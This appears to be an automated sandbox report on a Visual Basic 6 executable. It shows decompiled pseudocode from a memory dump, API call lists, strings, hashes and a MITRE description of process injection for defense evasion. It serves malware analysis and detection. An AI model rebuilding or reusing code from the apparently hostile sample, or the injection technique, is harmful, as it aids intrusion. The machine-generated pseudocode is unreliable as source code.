0x0041e9ee
0x0041e9f9
0x0041ea00
0x0041ea04
0x0041ea08
0x0041ea0c
0x0041ea10
0x0041ea14
0x0041ea15
0x0041ea1f
0x0041ea2a
0x0041ea31
0x0041ea35
0x0041ea39
0x0041ea3d
0x0041ea41
0x0041ea42
0x0041ea45
0x0041ea46
0x0041ea48
0x0041ea4d
0x0041ea50
0x0041ea57
0x0041ea96
0x0041ea9e
0x0041eaa6
0x0041eaab

APIs

__vbaStrCopy.MSVBVM60 ref: 0041E8E0
__vbaVarErrI4.MSVBVM60(?,00003F6B), ref: 0041E8F1
#559.MSVBVM60(00000000,?,00003F6B), ref: 0041E8F7
__vbaFreeVar.MSVBVM60(00000000,?,00003F6B), ref: 0041E910
__vbaNew2.MSVBVM60(0041B418,004204C8,00000000,?,00003F6B), ref: 0041E930
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E954
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E980
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E988
#611.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E98D
__vbaStrMove.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E997
__vbaVarDup.MSVBVM60(00000000,?,0041B428,00000138), ref: 0041E9EE
#596.MSVBVM60(?,?,?,?,?,?,?), ref: 0041EA15
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?), ref: 0041EA1F
__vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041EA48
__vbaFreeStr.MSVBVM60(0041EAAC,00000000,?,00003F6B), ref: 0041EA96
__vbaFreeStr.MSVBVM60(0041EAAC,00000000,?,00003F6B), ref: 0041EA9E
__vbaFreeStr.MSVBVM60(0041EAAC,00000000,?,00003F6B), ref: 0041EAA6

Strings

Passionwort5, xrefs: 0041E9DA
VESTE, xrefs: 0041E960

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#559#596#611CopyListNew2
String ID: Passionwort5$VESTE
API String ID: 1845080277-3863774961
Opcode ID: 0a7d2a37aad7b47114d34272648ab5b0ab791c836acffdd236a885a66d3e7bc3
Instruction ID: c9ec65aa77d88d981648f80a1f10c80b17c8042593b3e309d40367ada932346a
Opcode Fuzzy Hash: 0a7d2a37aad7b47114d34272648ab5b0ab791c836acffdd236a885a66d3e7bc3
Instruction Fuzzy Hash: FF51FCB1D10218ABCB50DF95C881ADEBBB8BF48704F50416BF509F7291DB785689CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF1B, Relevance: 33.2, APIs: 22, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0041DF1B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v32;
				char _v36;
				void* _v40;
				intOrPtr _v48;
				char _v56;
				char _v72;
				char _v92;
				char _v96;
				char* _t42;
				char* _t44;
				intOrPtr* _t48;
				char* _t49;
				void* _t52;
				intOrPtr* _t53;
				void* _t54;
				void* _t56;
				intOrPtr* _t57;
				void* _t58;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr _t93;

				_push(0x401386);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t86;
				_v12 = _t86 - 0x60;
				_v8 = 0x4012a0;
				_push(0);
				_push(0xffffffff);
				_t42 =  &_v56;
				_push(_t42);
				_push(0x41b54c);
				_push(0x41b554);
				_v24 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v72 = 0;
				_v92 = 0;
				_v96 = 0;
				_v48 = 0x80020004;
				_v56 = 0xa;
				L004014FA();
				L0040155A();
				_push(_t42);
				_push( &_v72);
				L00401500();
				_t44 =  &_v72;
				_push(_t44);
				_push(0x2008);
				L00401506();
				_v96 = _t44;
				_push( &_v96);
				_push( &_v24);
				L0040150C();
				L00401512();
				_push( &_v72);
				_t48 =  &_v56;
				_push(_t48);
				_t77 = 2;
				_push(_t77);
				L004014F4();
				_push(0);
				_push(_v24);
				L0040151E();
				_push( *_t48);
				_push(0x41b54c);
				L004014EE();
				if(_t48 != 0) {
					_push( &_v56);
					_v48 = _t77;
					_v56 = _t77;
					L004014E8();
					L0040155A();
					L00401548();
					_t90 =  *0x4204c8; // 0x2a5e8b4
					if(_t90 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t80 =  *0x4204c8; // 0x2a5e8b4
					_t52 =  *((intOrPtr*)( *_t80 + 0x14))(_t80,  &_v40);
					asm("fclex");
					if(_t52 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t80);
						_push(_t52);
						L00401530();
					}
					_t53 = _v40;
					_t81 = _t53;
					_t54 =  *((intOrPtr*)( *_t53 + 0x68))(_t53,  &_v92);
					asm("fclex");
					if(_t54 < 0) {
						_push(0x68);
						_push(0x41b428);
						_push(_t81);
						_push(_t54);
						L00401530();
					}
					L0040152A();
					_t93 =  *0x4204c8; // 0x2a5e8b4
					if(_t93 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t82 =  *0x4204c8; // 0x2a5e8b4
					_t56 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v40);
					asm("fclex");
					if(_t56 < 0) {
						_push(0x1c);
						_push(0x41b408);
						_push(_t82);
						_push(_t56);
						L00401530();
					}
					_t57 = _v40;
					_t83 = _t57;
					_t58 =  *((intOrPtr*)( *_t57 + 0x50))(_t57);
					asm("fclex");
					if(_t58 < 0) {
						_push(0x50);
						_push(0x41b438);
						_push(_t83);
						_push(_t58);
						L00401530();
					}
					L0040152A();
				}
				_push(0x41e10d);
				_t49 =  &_v24;
				_push(_t49);
				_push(0);
				L00401518();
				L00401512();
				return _t49;
			}

0x0041df20
0x0041df2b
0x0041df2c
0x0041df39
0x0041df3c
0x0041df45
0x0041df46
0x0041df48
0x0041df4b
0x0041df51
0x0041df52
0x0041df57
0x0041df5a
0x0041df5d
0x0041df60
0x0041df63
0x0041df66
0x0041df69
0x0041df6c
0x0041df73
0x0041df7a
0x0041df84
0x0041df89
0x0041df8d
0x0041df8e
0x0041df93
0x0041df96
0x0041df97
0x0041df9c
0x0041dfa1
0x0041dfa7
0x0041dfab
0x0041dfac
0x0041dfb4
0x0041dfbc
0x0041dfbd
0x0041dfc0
0x0041dfc3
0x0041dfc4
0x0041dfc5
0x0041dfcd
0x0041dfce
0x0041dfd1
0x0041dfd6
0x0041dfd8
0x0041dfd9
0x0041dfe0
0x0041dfe9
0x0041dfea
0x0041dfed
0x0041dff0
0x0041dffa
0x0041e002
0x0041e007
0x0041e00d
0x0041e00f
0x0041e014
0x0041e019
0x0041e019
0x0041e01e
0x0041e02b
0x0041e02e
0x0041e032
0x0041e034
0x0041e036
0x0041e03b
0x0041e03c
0x0041e03d
0x0041e03d
0x0041e042
0x0041e04c
0x0041e04e
0x0041e051
0x0041e055
0x0041e057
0x0041e059
0x0041e05e
0x0041e05f
0x0041e060
0x0041e060
0x0041e068
0x0041e06d
0x0041e073
0x0041e075
0x0041e07a
0x0041e07f
0x0041e07f
0x0041e084
0x0041e091
0x0041e094
0x0041e098
0x0041e09a
0x0041e09c
0x0041e0a1
0x0041e0a2
0x0041e0a3
0x0041e0a3
0x0041e0a8
0x0041e0ae
0x0041e0b0
0x0041e0b3
0x0041e0b7
0x0041e0b9
0x0041e0bb
0x0041e0c0
0x0041e0c1
0x0041e0c2
0x0041e0c2
0x0041e0ca
0x0041e0ca
0x0041e0cf
0x0041e0f9
0x0041e0fc
0x0041e0fd
0x0041e0ff
0x0041e107
0x0041e10c

APIs

__vbaStrCat.MSVBVM60(0041B554,0041B54C,?,000000FF,00000000), ref: 0041DF7A
__vbaStrMove.MSVBVM60(0041B554,0041B54C,?,000000FF,00000000), ref: 0041DF84
#711.MSVBVM60(?,00000000,0041B554,0041B54C,?,000000FF,00000000), ref: 0041DF8E
__vbaAryVar.MSVBVM60(00002008,?,?,00000000,0041B554,0041B54C,?,000000FF,00000000), ref: 0041DF9C
__vbaAryCopy.MSVBVM60(?,?,00002008,?,?,00000000,0041B554,0041B54C,?,000000FF,00000000), ref: 0041DFAC
__vbaFreeStr.MSVBVM60(?,?,00002008,?,?,00000000,0041B554,0041B54C,?,000000FF,00000000), ref: 0041DFB4
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,00002008,?,?,00000000,0041B554,0041B54C,?,000000FF,00000000), ref: 0041DFC5
__vbaDerefAry1.MSVBVM60(?,00000000), ref: 0041DFD1
__vbaStrCmp.MSVBVM60(0041B54C,00000000,?,00000000), ref: 0041DFD9
#536.MSVBVM60(0000000A,0041B54C,00000000,?,00000000), ref: 0041DFF0
__vbaStrMove.MSVBVM60(0000000A,0041B54C,00000000,?,00000000), ref: 0041DFFA
__vbaFreeVar.MSVBVM60(0000000A,0041B54C,00000000,?,00000000), ref: 0041E002
__vbaNew2.MSVBVM60(0041B418,004204C8,0000000A,0041B54C,00000000,?,00000000), ref: 0041E019
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E03D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000068), ref: 0041E060
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000068), ref: 0041E068
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041E07F
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,0000001C), ref: 0041E0A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B438,00000050), ref: 0041E0C2
__vbaFreeObj.MSVBVM60(00000000,?,0041B438,00000050), ref: 0041E0CA
__vbaAryDestruct.MSVBVM60(00000000,?,0041E10D,0041B54C,00000000,?,00000000), ref: 0041E0FF
__vbaFreeStr.MSVBVM60(00000000,?,0041E10D,0041B54C,00000000,?,00000000), ref: 0041E107

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$MoveNew2$#536#711Ary1CopyDerefDestructList
String ID:
API String ID: 460238673-0
Opcode ID: 656eca98f6e12cae9ccae74c20bc58c48b2f8029d56db81e1b9fdf5c3b4d97a5
Instruction ID: bfdb7b6199396b8b22a78589207e8a4e66ae97f4eb71ec37dbdb4a543fcc757e
Opcode Fuzzy Hash: 656eca98f6e12cae9ccae74c20bc58c48b2f8029d56db81e1b9fdf5c3b4d97a5
Instruction Fuzzy Hash: E0514F71901218BBDB10EF96CD86EDEBBB8EF58304F60412EF105B71E1E7785A458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC74, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E0041EC74(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _v52;
				intOrPtr _v60;
				char _v68;
				intOrPtr _v76;
				char _v84;
				intOrPtr _v92;
				char _v100;
				char _v152;
				signed int _t37;
				char* _t39;
				void* _t41;
				intOrPtr* _t42;
				void* _t43;
				char _t44;
				char _t51;
				intOrPtr* _t70;
				intOrPtr* _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				long long* _t76;
				intOrPtr _t79;
				long long _t82;

				_push(0x401386);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t74;
				_t75 = _t74 - 0x98;
				_v12 = _t75;
				_v8 = 0x401320;
				_t51 = 2;
				_t37 =  &_v68;
				_push(_t37);
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v84 = 0;
				_v100 = 0;
				_v152 = 0;
				_v60 = 0xe;
				_v68 = _t51;
				L00401452();
				L0040155A();
				_push(_t37);
				_push(L"Out of string");
				_push(L" space");
				L004014FA();
				L0040155A();
				_push(_t37);
				L004014EE();
				_push( &_v48);
				asm("sbb esi, esi");
				_t39 =  &_v44;
				_push(_t39);
				_push(_t51);
				L004014CA();
				_t76 = _t75 + 0xc;
				L00401548();
				if( ~( ~( ~_t37)) != 0) {
					_t79 =  *0x4204c8; // 0x2a5e8b4
					if(_t79 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t70 =  *0x4204c8; // 0x2a5e8b4
					_t41 =  *((intOrPtr*)( *_t70 + 0x14))(_t70,  &_v52);
					asm("fclex");
					if(_t41 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t70);
						_push(_t41);
						L00401530();
					}
					_t42 = _v52;
					_t71 = _t42;
					_t43 =  *((intOrPtr*)( *_t42 + 0x140))(_t42,  &_v152);
					asm("fclex");
					if(_t43 < 0) {
						_push(0x140);
						_push(0x41b428);
						_push(_t71);
						_push(_t43);
						L00401530();
					}
					L0040152A();
					_t82 =  *0x401318;
					_t44 = 0xa;
					_v100 = _t44;
					_v84 = _t44;
					_v68 = _t44;
					_push( &_v100);
					_push( &_v84);
					_push( &_v68);
					_push(0x80020004);
					_push(0x80020004);
					 *_t76 = _t82;
					_push(0x80020004);
					_push(0x80020004);
					asm("fld1");
					 *_t76 = _t82;
					_v92 = 0x80020004;
					_push(0x80020004);
					asm("fld1");
					_push(0x80020004);
					 *_t76 = _t82;
					_v76 = 0x80020004;
					_v60 = 0x80020004;
					L0040144C();
					st0 = _t82;
					_push( &_v100);
					_push( &_v84);
					_t39 =  &_v68;
					_push(_t39);
					_push(3);
					L004014F4();
					_push(L"LITOTERS");
					_push(0x33);
					_push(0xffffffff);
					_push(0x20);
					L004014C4();
				}
				L00401446();
				st0 = _t82;
				_v40 = 0x63b7;
				asm("wait");
				_push(0x41ee45);
				return _t39;
			}

0x0041ec79
0x0041ec84
0x0041ec85
0x0041ec8c
0x0041ec95
0x0041ec98
0x0041eca3
0x0041eca4
0x0041eca7
0x0041eca8
0x0041ecab
0x0041ecae
0x0041ecb1
0x0041ecb4
0x0041ecb7
0x0041ecbd
0x0041ecc4
0x0041ecc7
0x0041ecd1
0x0041ecd6
0x0041ecd7
0x0041ecdc
0x0041ece1
0x0041eceb
0x0041ecf0
0x0041ecf1
0x0041ecfb
0x0041ecfe
0x0041ed00
0x0041ed03
0x0041ed06
0x0041ed09
0x0041ed0e
0x0041ed14
0x0041ed1c
0x0041ed22
0x0041ed28
0x0041ed2a
0x0041ed2f
0x0041ed34
0x0041ed34
0x0041ed39
0x0041ed46
0x0041ed49
0x0041ed4d
0x0041ed4f
0x0041ed51
0x0041ed56
0x0041ed57
0x0041ed58
0x0041ed58
0x0041ed5d
0x0041ed6a
0x0041ed6c
0x0041ed72
0x0041ed76
0x0041ed78
0x0041ed7d
0x0041ed82
0x0041ed83
0x0041ed84
0x0041ed84
0x0041ed8c
0x0041ed91
0x0041ed99
0x0041ed9a
0x0041ed9d
0x0041eda0
0x0041edab
0x0041edaf
0x0041edb3
0x0041edb4
0x0041edb5
0x0041edb6
0x0041edb9
0x0041edba
0x0041edbb
0x0041edbd
0x0041edc0
0x0041edc3
0x0041edc4
0x0041edc6
0x0041edc7
0x0041edca
0x0041edcd
0x0041edd0
0x0041edd5
0x0041edda
0x0041edde
0x0041eddf
0x0041ede2
0x0041ede3
0x0041ede5
0x0041eded
0x0041edf2
0x0041edf4
0x0041edf6
0x0041edf8
0x0041edf8
0x0041edfd
0x0041ee02
0x0041ee04
0x0041ee0b
0x0041ee0c
0x00000000

APIs

#651.MSVBVM60(?), ref: 0041ECC7
__vbaStrMove.MSVBVM60(?), ref: 0041ECD1
__vbaStrCat.MSVBVM60( space,Out of string,00000000,?), ref: 0041ECE1
__vbaStrMove.MSVBVM60( space,Out of string,00000000,?), ref: 0041ECEB
__vbaStrCmp.MSVBVM60(00000000, space,Out of string,00000000,?), ref: 0041ECF1
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000, space,Out of string,00000000,?), ref: 0041ED09
__vbaFreeVar.MSVBVM60 ref: 0041ED14
__vbaNew2.MSVBVM60(0041B418,004204C8), ref: 0041ED34
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041ED58
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,00000140), ref: 0041ED84
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,00000140), ref: 0041ED8C
#680.MSVBVM60(80020004,80020004,80020004,80020004,80020004,80020004,?,?,?), ref: 0041EDD0
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,80020004,80020004,80020004,80020004,80020004,80020004,?,?,?), ref: 0041EDE5
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000033,LITOTERS,80020004,?,?,?), ref: 0041EDF8
#535.MSVBVM60(00000020,000000FF,00000033,LITOTERS,80020004,?,?,?), ref: 0041EDFD

Strings

space, xrefs: 0041ECDC
Out of string, xrefs: 0041ECD7
LITOTERS, xrefs: 0041EDED

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultListMove$#535#651#680FileNew2Open
String ID: space$LITOTERS$Out of string
API String ID: 2539957257-3943730560
Opcode ID: bf1e5ed51a27a92202a19b5b2ea44ca751b91e89333dbaed5e092348881c328b
Instruction ID: 909294150be97165226023630bf6ee6c6f05eeece8e78fe7026c599738f096a8
Opcode Fuzzy Hash: bf1e5ed51a27a92202a19b5b2ea44ca751b91e89333dbaed5e092348881c328b
Instruction Fuzzy Hash: 24419EB1D40218ABDB10EB95CC86EEEBBB8FF54700F14422FF105B72A1D77859418BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB73, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E0041EB73(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v32;
				intOrPtr _v40;
				char _v48;
				char _v64;
				signed int _t22;
				char _t43;
				intOrPtr _t46;

				_push(0x401386);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t46;
				_v12 = _t46 - 0x44;
				_v8 = 0x401308;
				_t22 =  &_v48;
				_push(_t22);
				_v24 = 0;
				_v32 = 0;
				_v64 = 0;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L0040146A();
				L0040155A();
				_push(_t22);
				_push(L"SLUTOPGR");
				L004014EE();
				asm("sbb esi, esi");
				L00401512();
				L00401548();
				if( ~( ~_t22 + 1) != 0) {
					L00401464();
					_t43 = 2;
					_push( &_v48);
					_push( &_v64);
					_v40 = _t43;
					_v48 = _t43;
					L0040145E();
					_push( &_v64);
					L00401554();
					L0040155A();
					_push( &_v64);
					_t22 =  &_v48;
					_push(_t22);
					_push(_t43);
					L004014F4();
					_push(0x1a);
					L00401458();
				}
				_push(0x41ec61);
				L00401512();
				return _t22;
			}

0x0041eb78
0x0041eb83
0x0041eb84
0x0041eb91
0x0041eb94
0x0041eb9d
0x0041eba0
0x0041eba1
0x0041eba4
0x0041eba7
0x0041ebaa
0x0041ebb1
0x0041ebb8
0x0041ebc2
0x0041ebc7
0x0041ebc8
0x0041ebcd
0x0041ebd6
0x0041ebde
0x0041ebe6
0x0041ebee
0x0041ebf0
0x0041ebf7
0x0041ebfb
0x0041ebff
0x0041ec00
0x0041ec03
0x0041ec06
0x0041ec0e
0x0041ec0f
0x0041ec19
0x0041ec21
0x0041ec22
0x0041ec25
0x0041ec26
0x0041ec27
0x0041ec2f
0x0041ec31
0x0041ec31
0x0041ec36
0x0041ec5b
0x0041ec60

APIs

#646.MSVBVM60(?), ref: 0041EBB8
__vbaStrMove.MSVBVM60(?), ref: 0041EBC2
__vbaStrCmp.MSVBVM60(SLUTOPGR,00000000,?), ref: 0041EBCD
__vbaFreeStr.MSVBVM60(SLUTOPGR,00000000,?), ref: 0041EBDE
__vbaFreeVar.MSVBVM60(SLUTOPGR,00000000,?), ref: 0041EBE6
#554.MSVBVM60(SLUTOPGR,00000000,?), ref: 0041EBF0
#613.MSVBVM60(?,0000000A,SLUTOPGR,00000000,?), ref: 0041EC06
__vbaStrVarMove.MSVBVM60(?,?,0000000A,SLUTOPGR,00000000,?), ref: 0041EC0F
__vbaStrMove.MSVBVM60(?,?,0000000A,SLUTOPGR,00000000,?), ref: 0041EC19
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,?,?,0000000A,SLUTOPGR,00000000,?), ref: 0041EC27
#569.MSVBVM60(0000001A), ref: 0041EC31
__vbaFreeStr.MSVBVM60(0041EC61,SLUTOPGR,00000000,?), ref: 0041EC5B

Strings

SLUTOPGR, xrefs: 0041EBC8

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#554#569#613#646List
String ID: SLUTOPGR
API String ID: 157529270-963005391
Opcode ID: d8fc65971e9b3b6423de53e1e38de240b461e2fac445047e37a60f155c19d1d4
Instruction ID: 7cce710d87633f7dc61f60eed19d8dd243826270956dffabd534a527a10663dd
Opcode Fuzzy Hash: d8fc65971e9b3b6423de53e1e38de240b461e2fac445047e37a60f155c19d1d4
Instruction Fuzzy Hash: 88215AB1D00208AADB11FBA6CC42ADFB7BCDF44704F10812BF512B71A1DB785A05CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E48F, Relevance: 21.1, APIs: 14, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0041E48F(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v36;
				void* _v40;
				intOrPtr _v48;
				char _v56;
				char* _v64;
				char _v72;
				char _v76;
				char* _t37;
				char* _t38;
				void* _t40;
				intOrPtr* _t41;
				void* _t42;
				void* _t45;
				intOrPtr* _t46;
				void* _t47;
				intOrPtr* _t49;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t79;

				_push(0x401386);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_v12 = _t72 - 0x4c;
				_v8 = 0x4012c0;
				_v28 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v72 = 0;
				_v76 = 0;
				L004014BE();
				_v64 =  &_v36;
				_t37 =  &_v72;
				_push(_t37);
				_v72 = 0x6003;
				L004014B8();
				if(_t37 != 0xffff) {
					_t76 =  *0x4204c8; // 0x2a5e8b4
					if(_t76 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t66 =  *0x4204c8; // 0x2a5e8b4
					_t40 =  *((intOrPtr*)( *_t66 + 0x14))(_t66,  &_v40);
					asm("fclex");
					if(_t40 < 0) {
						_push(0x14);
						_push(0x41b408);
						_push(_t66);
						_push(_t40);
						L00401530();
					}
					_t41 = _v40;
					_t67 = _t41;
					_t42 =  *((intOrPtr*)( *_t41 + 0xc0))(_t41,  &_v76);
					asm("fclex");
					if(_t42 < 0) {
						_push(0xc0);
						_push(0x41b428);
						_push(_t67);
						_push(_t42);
						L00401530();
					}
					L0040152A();
					_push( &_v56);
					_v48 = 0x80020004;
					_v56 = 0xa;
					L004014B2();
					L00401548();
					_t79 =  *0x4204c8; // 0x2a5e8b4
					if(_t79 == 0) {
						_push(0x4204c8);
						_push(0x41b418);
						L00401536();
					}
					_t68 =  *0x4204c8; // 0x2a5e8b4
					_t45 =  *((intOrPtr*)( *_t68 + 0x4c))(_t68,  &_v40);
					asm("fclex");
					if(_t45 < 0) {
						_push(0x4c);
						_push(0x41b408);
						_push(_t68);
						_push(_t45);
						L00401530();
					}
					_t46 = _v40;
					_v64 = 0;
					_v72 = 2;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t49 = _t46;
					asm("movsd");
					_t47 =  *((intOrPtr*)( *_t46 + 0x2c))(_t46);
					asm("fclex");
					if(_t47 < 0) {
						_push(0x2c);
						_push(0x41b5a4);
						_push(_t49);
						_push(_t47);
						L00401530();
					}
					L0040152A();
				}
				_push(0x41e625);
				L00401512();
				_t38 =  &_v36;
				_push(_t38);
				_push(0);
				L00401518();
				return _t38;
			}

0x0041e494
0x0041e49f
0x0041e4a0
0x0041e4ad
0x0041e4b0
0x0041e4bf
0x0041e4c2
0x0041e4c5
0x0041e4c8
0x0041e4cb
0x0041e4ce
0x0041e4d1
0x0041e4d9
0x0041e4dc
0x0041e4df
0x0041e4e0
0x0041e4e7
0x0041e4f0
0x0041e4f6
0x0041e4fc
0x0041e4fe
0x0041e503
0x0041e508
0x0041e508
0x0041e50d
0x0041e51a
0x0041e51d
0x0041e521
0x0041e523
0x0041e525
0x0041e52a
0x0041e52b
0x0041e52c
0x0041e52c
0x0041e531
0x0041e53b
0x0041e53d
0x0041e543
0x0041e547
0x0041e549
0x0041e54e
0x0041e553
0x0041e554
0x0041e555
0x0041e555
0x0041e55d
0x0041e565
0x0041e566
0x0041e56d
0x0041e574
0x0041e57c
0x0041e581
0x0041e587
0x0041e589
0x0041e58e
0x0041e593
0x0041e593
0x0041e598
0x0041e5a5
0x0041e5a8
0x0041e5ac
0x0041e5ae
0x0041e5b0
0x0041e5b5
0x0041e5b6
0x0041e5b7
0x0041e5b7
0x0041e5bc
0x0041e5bf
0x0041e5c2
0x0041e5d3
0x0041e5d4
0x0041e5d5
0x0041e5d7
0x0041e5d9
0x0041e5da
0x0041e5df
0x0041e5e1
0x0041e5e3
0x0041e5e5
0x0041e5ea
0x0041e5eb
0x0041e5ec
0x0041e5ec
0x0041e5f4
0x0041e5f4
0x0041e5f9
0x0041e614
0x0041e619
0x0041e61c
0x0041e61d
0x0041e61f
0x0041e624

APIs

__vbaStrCopy.MSVBVM60 ref: 0041E4D1
#556.MSVBVM60(?), ref: 0041E4E7
__vbaNew2.MSVBVM60(0041B418,004204C8,?), ref: 0041E508
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,00000014), ref: 0041E52C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B428,000000C0), ref: 0041E555
__vbaFreeObj.MSVBVM60(00000000,?,0041B428,000000C0), ref: 0041E55D
#648.MSVBVM60(?), ref: 0041E574
__vbaFreeVar.MSVBVM60(?), ref: 0041E57C
__vbaNew2.MSVBVM60(0041B418,004204C8,?), ref: 0041E593
__vbaHresultCheckObj.MSVBVM60(00000000,02A5E8B4,0041B408,0000004C), ref: 0041E5B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041B5A4,0000002C), ref: 0041E5EC
__vbaFreeObj.MSVBVM60(00000000,?,0041B5A4,0000002C), ref: 0041E5F4
__vbaFreeStr.MSVBVM60(0041E625,?), ref: 0041E614
__vbaAryDestruct.MSVBVM60(00000000,?,0041E625,?), ref: 0041E61F

Memory Dump Source

Source File: 00000000.00000002.1184312770.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1184298425.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1184362913.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1184369073.0000000000421000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#556#648CopyDestruct
String ID:
API String ID: 2917376486-0
Opcode ID: cda80f96ff50899687f54e062db9b4af8524e8deb602d3896970365c3fe16697
Instruction ID: 849a1667b051aef69aca92c9f6f8a7fdb6d423477ba408192fc7f423eeb4387b
Opcode Fuzzy Hash: cda80f96ff50899687f54e062db9b4af8524e8deb602d3896970365c3fe16697
Instruction Fuzzy Hash: D941B171941204BBDB10EF96CD46EDEBBF9EF54304F60412EF501B71A2E7786A418BA8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

